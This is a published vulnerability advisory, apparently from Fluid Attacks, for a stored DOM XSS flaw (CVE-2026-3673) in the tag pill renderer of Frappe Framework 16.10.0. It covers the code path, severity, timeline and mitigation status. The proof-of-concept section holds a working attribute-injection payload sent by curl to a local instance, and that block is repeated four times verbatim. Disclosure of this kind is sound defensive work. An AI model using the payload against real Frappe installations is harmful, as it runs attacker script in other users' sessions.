

Advisories

Frappe Framework 16.10.0 - Stored DOM XSS in Tag Pill Renderer

4,6

Medium

Detected by

Fluid Attacks AI SAST Scanner

Disclosed by

Oscar Uribe

Summary

Full name

Frappe Framework 16.10.0 - Stored DOM XSS in Tag Pill Renderer

Code name

silvio

State

Public

Release date

21 abr 2026

Affected product

Frappe

Vendor

Frappe

Affected version(s)

16.10.0

Vulnerability name

Stored cross-site scripting (XSS)

Vulnerability type

010. Stored cross-site scripting (XSS)

Remotely exploitable

Yes

CVSS v4.0 vector string

CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

CVSS v4.0 base score

4.6

Exploit available

Yes

CVE ID(s)

CVE-2026-3673

Description

An authenticated attacker can store a crafted tag value in _user_tags and trigger JavaScript execution when a victim opens the list/report view where tags are rendered. The vulnerable renderer interpolates tag content into HTML attributes and element content without escaping.

Vulnerability

The vulnerable path is:

1. Source: attacker-controlled tag value via frappe.desk.doctype.tag.tag.add_tag.

2. Persistence: _user_tags stores comma-separated tags.

3. Sink builder: ListView.get_tags_html renders:

title="${tag}"
${tag} in inner HTML without escaping.

DOM insertion: rendered row HTML is inserted in list/report view, enabling attribute injection (e.g., onmouseover).

PoC

curl -s -X POST 'http://localhost:18080/api/method/frappe.desk.doctype.tag.tag.add_tag' \
-b /tmp/frappe.cookies \
--data-urlencode 'tag=xss" onmouseover="alert(7171)" z="' \
--data-urlencode 'dt=XSS Parent' \
--data-urlencode 'dn=p48ru7k4hg'

curl -s -X POST 'http://localhost:18080/api/method/frappe.desk.doctype.tag.tag.add_tag' \
-b /tmp/frappe.cookies \
--data-urlencode 'tag=xss" onmouseover="alert(7171)" z="' \
--data-urlencode 'dt=XSS Parent' \
--data-urlencode 'dn=p48ru7k4hg'

curl -s -X POST 'http://localhost:18080/api/method/frappe.desk.doctype.tag.tag.add_tag' \
-b /tmp/frappe.cookies \
--data-urlencode 'tag=xss" onmouseover="alert(7171)" z="' \
--data-urlencode 'dt=XSS Parent' \
--data-urlencode 'dn=p48ru7k4hg'

curl -s -X POST 'http://localhost:18080/api/method/frappe.desk.doctype.tag.tag.add_tag' \
-b /tmp/frappe.cookies \
--data-urlencode 'tag=xss" onmouseover="alert(7171)" z="' \
--data-urlencode 'dt=XSS Parent' \
--data-urlencode 'dn=p48ru7k4hg'

Visit:

http://localhost:18080/app/xss-parent/view/report

Enable Show Tags In list settings, if hidden
Move the cursor over the malicious tag pill

Evidence of Exploitation

Video of exploitation
Static evidence

Our security policy

We have reserved the ID CVE-2026-3673 to refer to this issue from now on.

Disclosure policy

System Information

Frappe
Version: 16.10.0
Operating System: Any

References

Github Repository: https://github.com/frappe/frappe
Security: https://github.com/frappe/frappe/security

Mitigation

There is currently no patch available for this vulnerability.

Credits

The vulnerability was discovered by Oscar Uribe from Fluid Attacks' Offensive Team using the AI SAST Scanner.

Timeline



6 mar 2026

Vulnerability discovered



6 mar 2026

Vendor contacted



24 mar 2026

Vendor replied



21 abr 2026

Public disclosure

Does your application use this vulnerable software?

During our free trial, our tools assess your application, identify vulnerabilities, and provide recommendations for their remediation.

Start free trial

Las soluciones de Fluid Attacks permiten a las organizaciones identificar, priorizar y remediar vulnerabilidades en su software a lo largo del SDLC. Con el apoyo de la IA, herramientas automatizadas y pentesters, Fluid Attacks acelera la mitigación de la exposición al riesgo de las empresas y fortalece su postura de ciberseguridad.

Lee un resumen de Fluid Attacks